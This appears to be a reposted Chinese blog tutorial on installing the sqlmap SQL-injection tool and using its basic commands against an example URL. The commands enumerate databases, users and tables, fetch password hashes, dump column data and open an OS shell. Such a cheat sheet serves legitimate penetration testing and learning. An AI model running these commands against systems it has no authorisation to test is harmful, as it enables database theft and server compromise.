linux安装了git的话直接git clone
// git clone https://github.com/sqlmapproject/sqlmap.git
直接下载:
https://github.com/sqlmapproject/sqlmap/archive/master.zip
unzip ./master.zip
windows下的安装
安装Python2.6 然后设置环境变量。把python添加进去,比如我装到D:\Python26
就在path的最后加 D:\Python26
解压sqlmap到硬盘
比如D:/sqlmap,打开CMD,输入python D:\sqlmap\sqlmap.py 就可以用了。
列几个基本命令
./sqlmap.py –h //查看帮助信息
./sqlmap.py –u “http://www.anti-x.net/inject.asp?id=injecthere” //get注入
./sqlmap.py –u “http://www.anti-x.net/inject.asp?id=injecthere” --data “DATA”//post注入
./sqlmap.py –u “http://www.anti-x.net/inject.asp?id=injecthere” --cookie “COOKIE”//修改请求时的cookie
./sqlmap.py –u “http://www.anti-x.net/inject.asp?id=injecthere” --dbs //列数据库
./sqlmap.py –u “http://www.anti-x.net/inject.asp?id=injecthere” –-users //列用户
./sqlmap.py –u “http://www.anti-x.net/inject.asp?id=injecthere” –-passwords //获取密码hash
./sqlmap.py –u “http://www.anti-x.net/inject.asp?id=injecthere” –-tables -D DB_NAME //列DB_NAME的表
./sqlmap.py –u “http://www.anti-x.net/inject.asp?id=injecthere” –-columns –T TB_NAME -D DB_NAME //读取TB_NAME中的列
./sqlmap.py –u “http://www.anti-x.net/inject.asp?id=injecthere” –-dump –C C1,C2,C3 –T TB_NAME -D DB_NAME //读字段C1,C2,C3数据
./sqlmap.py –u “http://www.anti-x.net/inject.asp?id=injecthere” –-os-shell //取得一个shell
1、从sqlmap.org官网直接下载,使用的是windows系统下载.zip文件。
2、在python官网python.org下载python2.7的安装包。
3、python2.7下载默认下一步安装,python2.7需要设置计算机的环境变量,python3可以在安装程序中直接选择。选择开始程序中python点击右键属性查看安装目录。
4、右键计算机选择属性,打开高级系统设置选择高级点击环境变量。
5、查看系统环境变量Path,将刚才查看python安装目录复制进去。在命令提示框中输入python检测是否成功。
欢迎分享,转载请注明来源:内存溢出
评论列表(0条)